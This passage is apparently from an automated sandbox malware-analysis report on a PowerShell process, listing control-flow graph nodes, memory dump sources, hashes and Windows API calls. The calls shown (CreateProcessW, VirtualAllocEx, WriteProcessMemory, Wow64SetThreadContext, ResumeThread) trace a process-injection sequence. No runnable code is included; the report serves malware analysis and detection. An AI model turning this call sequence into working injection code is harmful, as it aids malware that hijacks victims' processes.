172 4a98c6c-4a98c85 call 4a97314 163->172 164->129 170 4a98d5f-4a98d66 164->170 173 4a98d68-4a98da6 ResumeThread 170->173 174 4a98dc3-4a98dd6 170->174 178 4a98c8a-4a98c8c 172->178 176 4a98da8-4a98dae 173->176 177 4a98daf-4a98dbc 173->177 180 4a98ddd-4a98df0 174->180 176->177 177->180 181 4a98dbe-4a98f74 177->181 178->113 183 4a98c92-4a98c99 178->183 180->145 181->84 183->154 183->160
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 04A98A6A
                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 04A98B0C
                                                                                                                                                            • Part of subcall function 04A97314: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18BB2514,00000000,?,?,?,00000000,00000000,?,04A98B6F,?,00000000,?), ref: 04A993E4
                                                                                                                                                          • ResumeThread.KERNELBASE(?), ref: 04A98D8F
                                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04A990F4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2440361913.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_4a90000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4270437565-0
                                                                                                                                                          • Opcode ID: 163c89903d466f4c538de99e15b450dedd786c61cee607729ece95f175ba974a
                                                                                                                                                          • Instruction ID: 6026bed685e2ee046a3003a687e8ced7d6a9b127a7fbd942c91770efa81edb85
                                                                                                                                                          • Opcode Fuzzy Hash: 163c89903d466f4c538de99e15b450dedd786c61cee607729ece95f175ba974a
                                                                                                                                                          • Instruction Fuzzy Hash: 31428D70A10219DFEF24EF65C854B9EB7F2AF85340F1485ADD809AB290DB38AD85CF51

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 411 4a97fe4-4a982a5 412 4a982ae-4a982be 411->412 413 4a982a7-4a982a9 411->413 415 4a982c0 412->415 416 4a982c5-4a982d5 412->416 414 4a9857a-4a98581 413->414 415->414 418 4a982db-4a982e9 416->418 419 4a98561-4a9856f 416->419 422 4a982ef 418->422 423 4a98582-4a985f9 418->423 419->423 424 4a98571-4a98575 call 4a91f70 419->424 422->423 425 4a983ab-4a983cc 422->425 426 4a9844a-4a98472 422->426 427 4a98385-4a983a6 422->427 428 4a984e6-4a98512 422->428 429 4a98338-4a98359 422->429 430 4a984bb-4a984e1 422->430 431 4a9841d-4a98445 422->431 432 4a9835e-4a98380 422->432 433 4a983d1-4a983f2 422->433 434 4a98531-4a98553 422->434 435 4a98555-4a9855f 422->435 436 4a98514-4a9852f call 4a90328 422->436 437 4a983f7-4a98418 422->437 438 4a98477-4a984b6 422->438 439 4a982f6-4a98305 422->439 424->414 425->414 426->414 427->414 428->414 429->414 430->414 431->414 432->414 433->414 434->414 435->414 436->414 437->414 438->414 457 4a9831e-4a9832d 439->457 458 4a98307-4a9831c 439->458 479 4a98333 457->479 458->479 479->414
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2440361913.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_4a90000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 46e08e1d67932f060e3df6d6d24b1df3a126846100dc09acfb33ccd3f9a543a3
                                                                                                                                                          • Instruction ID: f33c90ee31043ed46c09af0bf2046ccf5c4689984cd5231ae4d8f5057cdef9c7
                                                                                                                                                          • Opcode Fuzzy Hash: 46e08e1d67932f060e3df6d6d24b1df3a126846100dc09acfb33ccd3f9a543a3
                                                                                                                                                          • Instruction Fuzzy Hash: 12917B74B00259CBDB48AB74886467E7BF6ABCD740B04C96DE402EB288DF38DC469791

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 188 4a972f0-4a99029 190 4a9902b-4a9902e 188->190 191 4a99031-4a99038 188->191 190->191 192 4a9903a-4a99040 191->192 193 4a99043-4a99059 191->193 192->193 194 4a9905b-4a99061 193->194 195 4a99064-4a99107 CreateProcessW 193->195 194->195 197 4a99109-4a9910f 195->197 198 4a99110-4a99188 195->198 197->198 205 4a9919a-4a991a1 198->205 206 4a9918a-4a99190 198->206 207 4a991b8 205->207 208 4a991a3-4a991b2 205->208 206->205 210 4a991b9 207->210 208->207 210->210
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04A990F4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2440361913.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_4a90000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                          • Opcode ID: 61fa5fafc99b18a665a5f4128812e8f752bd9a56d36353e9255a964969f43681
                                                                                                                                                          • Instruction ID: 87aec5ff115483fa76055ccfc1302137583c5f12c5f90cf917dbf21ee0337bb7
                                                                                                                                                          • Opcode Fuzzy Hash: 61fa5fafc99b18a665a5f4128812e8f752bd9a56d36353e9255a964969f43681
                                                                                                                                                          • Instruction Fuzzy Hash: C55117B1901259DFEF24CF99C940BDEBBF5BB48304F1080AAE909B7240D775AA84CF50

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 211 4a97314-4a993ae 213 4a993b8-4a993f1 WriteProcessMemory 211->213 214 4a993b0-4a993b6 211->214 215 4a993fa-4a9941b 213->215 216 4a993f3-4a993f9 213->216 214->213 216->215
                                                                                                                                                          APIs
                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18BB2514,00000000,?,?,?,00000000,00000000,?,04A98B6F,?,00000000,?), ref: 04A993E4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2440361913.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_4a90000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                          • Opcode ID: 4a7a351b366d9bcefee7d16cd898319267b940fe28633fd824408d8f1ba560ec
                                                                                                                                                          • Instruction ID: 1fe53504b09634d6225ecaac6ed90d7fb4ce72e6a250dea41fe3279a522c7166
                                                                                                                                                          • Opcode Fuzzy Hash: 4a7a351b366d9bcefee7d16cd898319267b940fe28633fd824408d8f1ba560ec
                                                                                                                                                          • Instruction Fuzzy Hash: 1221E6B19003599FDB10CF99C984BDEBBF8FB48320F108029E914A7350D378A944CFA1

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 218 4a99360-4a993ae 220 4a993b8-4a993f1 WriteProcessMemory 218->220 221 4a993b0-4a993b6 218->221 222 4a993fa-4a9941b 220->222 223 4a993f3-4a993f9 220->223 221->220 223->222
                                                                                                                                                          APIs
                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18BB2514,00000000,?,?,?,00000000,00000000,?,04A98B6F,?,00000000,?), ref: 04A993E4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2440361913.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_4a90000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                          • Opcode ID: f43ef0e964585c00a161b081201f59626c8ff30c77a3c0dd350b652e8685d0f1
                                                                                                                                                          • Instruction ID: dd59c4fd45178487e1c76972d4f65f76bcfe4b67cb2fba6fff063e108a45aa4a
                                                                                                                                                          • Opcode Fuzzy Hash: f43ef0e964585c00a161b081201f59626c8ff30c77a3c0dd350b652e8685d0f1
                                                                                                                                                          • Instruction Fuzzy Hash: 7E2107B59013199FDB10CF9AC984BDEBBF8FB48320F50842AE518A7350D378A944CFA1

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 225 4a991e9-4a99230 226 4a9923c-4a99268 Wow64SetThreadContext 225->226 227 4a99232-4a9923a 225->227 228 4a9926a-4a99270 226->228 229 4a99271-4a99292 226->229 227->226 228->229
                                                                                                                                                          APIs
                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04A98923), ref: 04A9925B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2440361913.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_4a90000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                          • Opcode ID: 4b4111e52b92416e3479a895fb4d1ebf67659ebf4aa71642b3fa21c7df7dfb20
                                                                                                                                                          • Instruction ID: 90d6e8e34c106759c0c5c6acb7fe584cbc123e151dc007f61e54839668869482
                                                                                                                                                          • Opcode Fuzzy Hash: 4b4111e52b92416e3479a895fb4d1ebf67659ebf4aa71642b3fa21c7df7dfb20
                                                                                                                                                          • Instruction Fuzzy Hash: 4D1112B68006198FDB10CFAAC944BDFBBF8EB88320F14802AD458B7700D778A545CFA1

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 231 4a972fc-4a99230 233 4a9923c-4a99268 Wow64SetThreadContext 231->233 234 4a99232-4a9923a 231->234 235 4a9926a-4a99270 233->235 236 4a99271-4a99292 233->236 234->233 235->236
                                                                                                                                                          APIs
                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04A98923), ref: 04A9925B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2440361913.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_4a90000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                          • Opcode ID: 6f357aa822a43c8dca9801ed901d786884e5afd6da071394d7fdbb4a6c3e77d9
                                                                                                                                                          • Instruction ID: c99e1f5fb81960d17ce71251e306f4521745bf953ebc1820847ea5c3ea4dab64
                                                                                                                                                          • Opcode Fuzzy Hash: 6f357aa822a43c8dca9801ed901d786884e5afd6da071394d7fdbb4a6c3e77d9
                                                                                                                                                          • Instruction Fuzzy Hash: 7A1117B59002499FDB10CF9AC544B9EBBF8EB88320F148029D818B7300D778A945CFA5

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 238 4a97320-4a99230 240 4a9923c-4a99268 Wow64SetThreadContext 238->240 241 4a99232-4a9923a 238->241 242 4a9926a-4a99270 240->242 243 4a99271-4a99292 240->243 241->240 242->243
                                                                                                                                                          APIs
                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04A98923), ref: 04A9925B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2440361913.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_4a90000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                          • Opcode ID: c412d9c390e0310aeb2c724b093c4978fc12849eb27866839a55656137874446
                                                                                                                                                          • Instruction ID: dc1c613cc7a5ff2f65c849aeb52bba669a51bbc04ddc609d1ba18328c8d6a2a0
                                                                                                                                                          • Opcode Fuzzy Hash: c412d9c390e0310aeb2c724b093c4978fc12849eb27866839a55656137874446
                                                                                                                                                          • Instruction Fuzzy Hash: 7C1117B59002499FDB10CF9AC544B9FBBF8EB88320F148029D918A7300D778A945CFA5

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 812 7a41f18-7a41f3a 814 7a420b7-7a420d6 812->814 815 7a41f40-7a41f45 812->815 821 7a420df-7a42102 814->821 822 7a420d8-7a420de 814->822 816 7a41f47-7a41f4d 815->816 817 7a41f5d-7a41f69 815->817 818 7a41f51-7a41f5b 816->818 819 7a41f4f 816->819 827 7a42062-7a4206c 817->827 828 7a41f6f-7a41f72 817->828 818->817 819->817 825 7a4225d-7a422a2 821->825 826 7a42108-7a4210d 821->826 822->821 842 7a4244c-7a4246a 825->842 843 7a422a8-7a422ad 825->843 831 7a42125-7a42129 826->831 832 7a4210f-7a42115 826->832 829 7a4206e-7a42077 827->829 830 7a4207a-7a42080 827->830 828->827 833 7a41f78-7a41f7f 828->833 835 7a42086-7a42092 830->835 836 7a42082-7a42084 830->836 840 7a4212f-7a42133 831->840 841 7a42208-7a42212 831->841 837 7a42117 832->837 838 7a42119-7a42123 832->838 833->814 839 7a41f85-7a41f8a 833->839 846 7a42094-7a420b4 835->846 836->846 837->831 838->831 847 7a41fa2-7a41fa6 839->847 848 7a41f8c-7a41f92 839->848 849 7a42135-7a42146 840->849 850 7a42173 840->850 844 7a42214-7a4221d 841->844 845 7a42220-7a42226 841->845 873 7a42473-7a4247c 842->873 874 7a4246c-7a42471 842->874 852 7a422c5-7a422c9 843->852 853 7a422af-7a422b5 843->853 854 7a4222c-7a42238 845->854 855 7a42228-7a4222a 845->855 847->827 851 7a41fac-7a41fb0 847->851 859 7a41f94 848->859 860 7a41f96-7a41fa0 848->860 849->825 876 7a4214c-7a42151 849->876 856 7a42175-7a42177 850->856 861 7a41fd0 851->861 862 7a41fb2-7a41fce 851->862 868 7a423f4-7a423fe 852->868 869 7a422cf-7a422d3 852->869 866 7a422b7 853->866 867 7a422b9-7a422c3 853->867 864 7a4223a-7a4225a 854->864 855->864 856->841 870 7a4217d-7a42181 856->870 859->847 860->847 872 7a41fd2-7a41fd4 861->872 862->872 866->852 867->852 877 7a42400-7a42409 868->877 878 7a4240c-7a42412 868->878 879 7a422d5-7a422e6 869->879 880 7a42313 869->880 870->841 881 7a42187-7a42196 870->881 872->827 885 7a41fda-7a41fe7 872->885 886 7a424b5-7a424bf 873->886 887 7a4247e-7a4249b 873->887 874->873 889 7a42153-7a42159 876->889 890 7a42169-7a42171 876->890 892 7a42414-7a42416 878->892 893 7a42418-7a42424 878->893 879->842 910 7a422ec-7a422f1 879->910 884 7a42315-7a42317 880->884 911 7a421ae-7a42205 881->911 912 7a42198-7a4219e 881->912 884->868 895 7a4231d-7a42321 884->895 925 7a41fee-7a41ff0 885->925 896 7a424c1-7a424c5 886->896 897 7a424c8-7a424ce 886->897 917 7a42505-7a4250a 887->917 918 7a4249d-7a424af 887->918 898 7a4215d-7a42167 889->898 899 7a4215b 889->899 890->856 902 7a42426-7a42449 892->902 893->902 895->868 904 7a42327-7a4232b 895->904 908 7a424d4-7a424e0 897->908 909 7a424d0-7a424d2 897->909 898->890 899->890 904->868 916 7a42331-7a42357 904->916 919 7a424e2-7a42502 908->919 909->919 921 7a422f3-7a422f9 910->921 922 7a42309-7a42311 910->922 923 7a421a0 912->923 924 7a421a2-7a421a4 912->924 916->868 941 7a4235d-7a42361 916->941 917->918 918->886 927 7a422fd-7a42307 921->927 928 7a422fb 921->928 922->884 923->911 924->911 931 7a41ff2-7a41ff8 925->931 932 7a42008-7a4205f 925->932 927->922 928->922 936 7a41ffc-7a41ffe 931->936 937 7a41ffa 931->937 936->932 937->932 942 7a42384 941->942 943 7a42363-7a4236c 941->943 946 7a42387-7a42394 942->946 944 7a42373-7a42380 943->944 945 7a4236e-7a42371 943->945 947 7a42382 944->947 945->947 949 7a4239a-7a423f1 946->949 947->946
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2475213844.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7a40000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6980b44aca0db6cff564e835c0fa6d438d3cd6becbb70b0c79f28a125aff235c
                                                                                                                                                          • Instruction ID: fc3ab8758d0047bcdf7570b4fffe6f5332d3eb87890faf69921df9a3b1333418
                                                                                                                                                          • Opcode Fuzzy Hash: 6980b44aca0db6cff564e835c0fa6d438d3cd6becbb70b0c79f28a125aff235c
                                                                                                                                                          • Instruction Fuzzy Hash: C5F1E3B1B0420ADFDB158F69D8047AABBB2FFC5314F14C07AE5298B291DB72D885C791

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 951 7a409c8-7a409eb 952 7a40bc6-7a40bde 951->952 953 7a409f1-7a409f6 951->953 961 7a40be7-7a40c0e 952->961 962 7a40be0-7a40be4 952->962 954 7a40a0e-7a40a12 953->954 955 7a409f8-7a409fe 953->955 959 7a40b73-7a40b7d 954->959 960 7a40a18-7a40a1c 954->960 957 7a40a00 955->957 958 7a40a02-7a40a0c 955->958 957->954 958->954 963 7a40b7f-7a40b88 959->963 964 7a40b8b-7a40b91 959->964 965 7a40a1e-7a40a2d 960->965 966 7a40a2f 960->966 967 7a40c14-7a40c19 961->967 968 7a40d7b-7a40dad 961->968 962->961 969 7a40b97-7a40ba3 964->969 970 7a40b93-7a40b95 964->970 971 7a40a31-7a40a33 965->971 966->971 973 7a40c31-7a40c35 967->973 974 7a40c1b-7a40c21 967->974 990 7a40dbd 968->990 991 7a40daf-7a40dbb 968->991 975 7a40ba5-7a40bc3 969->975 970->975 971->959 976 7a40a39-7a40a59 971->976 981 7a40d2a-7a40d34 973->981 982 7a40c3b-7a40c3d 973->982 978 7a40c25-7a40c2f 974->978 979 7a40c23 974->979 1004 7a40a78 976->1004 1005 7a40a5b-7a40a76 976->1005 978->973 979->973 984 7a40d36-7a40d3f 981->984 985 7a40d42-7a40d48 981->985 986 7a40c4d 982->986 987 7a40c3f-7a40c4b 982->987 992 7a40d4e-7a40d5a 985->992 993 7a40d4a-7a40d4c 985->993 995 7a40c4f-7a40c51 986->995 987->995 996 7a40dbf-7a40dc1 990->996 991->996 997 7a40d5c-7a40d78 992->997 993->997 995->981 1000 7a40c57-7a40c59 995->1000 1001 7a40dc3-7a40dc9 996->1001 1002 7a40e0d-7a40e17 996->1002 1006 7a40c69 1000->1006 1007 7a40c5b-7a40c67 1000->1007 1011 7a40dd7-7a40df4 1001->1011 1012 7a40dcb-7a40dcd 1001->1012 1008 7a40e22-7a40e28 1002->1008 1009 7a40e19-7a40e1f 1002->1009 1013 7a40a7a-7a40a7c 1004->1013 1005->1013 1010 7a40c6b-7a40c6d 1006->1010 1007->1010 1016 7a40e2e-7a40e3a 1008->1016 1017 7a40e2a-7a40e2c 1008->1017 1010->981 1018 7a40c73-7a40c75 1010->1018 1034 7a40df6-7a40e07 1011->1034 1035 7a40e5a-7a40e5f 1011->1035 1012->1011 1013->959 1019 7a40a82-7a40a84 1013->1019 1020 7a40e3c-7a40e57 1016->1020 1017->1020 1021 7a40c77-7a40c7d 1018->1021 1022 7a40c8f-7a40c93 1018->1022 1023 7a40a94 1019->1023 1024 7a40a86-7a40a92 1019->1024 1028 7a40c81-7a40c8d 1021->1028 1029 7a40c7f 1021->1029 1032 7a40c95-7a40c9b 1022->1032 1033 7a40cad-7a40d27 1022->1033 1031 7a40a96-7a40a98 1023->1031 1024->1031 1028->1022 1029->1022 1031->959 1036 7a40a9e-7a40abe 1031->1036 1038 7a40c9d 1032->1038 1039 7a40c9f-7a40cab 1032->1039 1034->1002 1035->1034 1049 7a40ad6-7a40ada 1036->1049 1050 7a40ac0-7a40ac6 1036->1050 1038->1033 1039->1033 1053 7a40af4-7a40af8 1049->1053 1054 7a40adc-7a40ae2 1049->1054 1051 7a40ac8 1050->1051 1052 7a40aca-7a40acc 1050->1052 1051->1049 1052->1049 1057 7a40aff-7a40b01 1053->1057 1055 7a40ae4 1054->1055 1056 7a40ae6-7a40af2 1054->1056 1055->1053 1056->1053 1058 7a40b03-7a40b09 1057->1058 1059 7a40b19-7a40b70 1057->1059 1061 7a40b0d-7a40b0f 1058->1061 1062 7a40b0b 1058->1062 1061->1059 1062->1059
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2475213844.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7a40000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 93544bd84ee029b2d8c3201ec356c661c6752e063b025e3dd9b0b05ee4961f32
                                                                                                                                                          • Instruction ID: 8c8ebab8e598831299d8d8716450b71bbbc9e9a3d4a70884389c8ca38dea8581
                                                                                                                                                          • Opcode Fuzzy Hash: 93544bd84ee029b2d8c3201ec356c661c6752e063b025e3dd9b0b05ee4961f32
                                                                                                                                                          • Instruction Fuzzy Hash: A4B129B170030ADFDB249B79880076BBBA5AFC1215F2480BBD665CB282DF77D845D7A1

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1064 7a413a0-7a413c6 1066 7a41572-7a41584 1064->1066 1067 7a413cc-7a413d1 1064->1067 1081 7a41586-7a41599 1066->1081 1082 7a4159b-7a415ba 1066->1082 1068 7a413d3-7a413d9 1067->1068 1069 7a413e9-7a413ed 1067->1069 1073 7a413dd-7a413e7 1068->1073 1074 7a413db 1068->1074 1071 7a413f3-7a413f5 1069->1071 1072 7a4151e-7a41528 1069->1072 1076 7a41405 1071->1076 1077 7a413f7-7a41403 1071->1077 1078 7a41536-7a4153c 1072->1078 1079 7a4152a-7a41533 1072->1079 1073->1069 1074->1069 1083 7a41407-7a41409 1076->1083 1077->1083 1084 7a41542-7a4154e 1078->1084 1085 7a4153e-7a41540 1078->1085 1081->1082 1088 7a415c0-7a415c5 1082->1088 1089 7a416ec-7a4171d 1082->1089 1083->1072 1086 7a4140f-7a41413 1083->1086 1087 7a41550-7a4156f 1084->1087 1085->1087 1090 7a41415-7a41424 1086->1090 1091 7a41426 1086->1091 1093 7a415c7-7a415cd 1088->1093 1094 7a415dd-7a415e1 1088->1094 1102 7a4172d 1089->1102 1103 7a4171f-7a4172b 1089->1103 1095 7a41428-7a4142a 1090->1095 1091->1095 1098 7a415d1-7a415db 1093->1098 1099 7a415cf 1093->1099 1100 7a415e7-7a415e9 1094->1100 1101 7a4169e-7a416a8 1094->1101 1095->1072 1104 7a41430-7a41432 1095->1104 1098->1094 1099->1094 1107 7a415f9 1100->1107 1108 7a415eb-7a415f7 1100->1108 1105 7a416b5-7a416bb 1101->1105 1106 7a416aa-7a416b2 1101->1106 1111 7a4172f-7a41731 1102->1111 1103->1111 1112 7a41434-7a41440 1104->1112 1113 7a41442 1104->1113 1114 7a416c1-7a416cd 1105->1114 1115 7a416bd-7a416bf 1105->1115 1109 7a415fb-7a415fd 1107->1109 1108->1109 1109->1101 1117 7a41603-7a41605 1109->1117 1118 7a41733-7a41752 1111->1118 1119 7a4179f-7a417a9 1111->1119 1120 7a41444-7a41446 1112->1120 1113->1120 1121 7a416cf-7a416e9 1114->1121 1115->1121 1123 7a41607-7a4160d 1117->1123 1124 7a4161f-7a4162a 1117->1124 1150 7a41754-7a41760 1118->1150 1151 7a41762 1118->1151 1125 7a417b2-7a417b8 1119->1125 1126 7a417ab-7a417af 1119->1126 1120->1072 1127 7a4144c-7a4144e 1120->1127 1128 7a41611-7a4161d 1123->1128 1129 7a4160f 1123->1129 1145 7a41642-7a4169b 1124->1145 1146 7a4162c-7a41632 1124->1146 1131 7a417be-7a417ca 1125->1131 1132 7a417ba-7a417bc 1125->1132 1134 7a41450-7a41456 1127->1134 1135 7a41468-7a41473 1127->1135 1128->1124 1129->1124 1141 7a417cc-7a417ea 1131->1141 1132->1141 1136 7a41458 1134->1136 1137 7a4145a-7a41466 1134->1137 1138 7a41475-7a41478 1135->1138 1139 7a41482-7a4148e 1135->1139 1136->1135 1137->1135 1138->1139 1147 7a41490-7a41492 1139->1147 1148 7a4149c-7a414a3 1139->1148 1154 7a41634 1146->1154 1155 7a41636-7a41638 1146->1155 1147->1148 1158 7a414aa-7a414ac 1148->1158 1157 7a41764-7a41766 1150->1157 1151->1157 1154->1145 1155->1145 1157->1119 1159 7a41768-7a41785 1157->1159 1161 7a414c4-7a4151b 1158->1161 1162 7a414ae-7a414b4 1158->1162 1167 7a41787-7a41799 1159->1167 1168 7a417ed-7a417f2 1159->1168 1164 7a414b6 1162->1164 1165 7a414b8-7a414ba 1162->1165 1164->1161 1165->1161 1167->1119 1168->1167
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.2475213844.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_7a40000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d9f8ca7180b0436b55e5dc79a0903dca53f05e0c2761b4eaa94dfeafcd66edb6
                                                                                                                                                          • Instruction ID: 8586176b5c1bbfaccaefdf0cb5e9d8333f7379c9f9eeaa919c50ab7089b71ab7
                                                                                                                                                          • Opcode Fuzzy Hash: d9f8ca7180b0436b55e5dc79a0903dca53f05e0c2761b4eaa94dfeafcd66edb6
                                                                                                                                                          • Instruction Fuzzy Hash: 4DB10BB570434EDFDB158B69C8006A6BBB5AFC5211F24807BD565CB251EB32C9C1C762

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
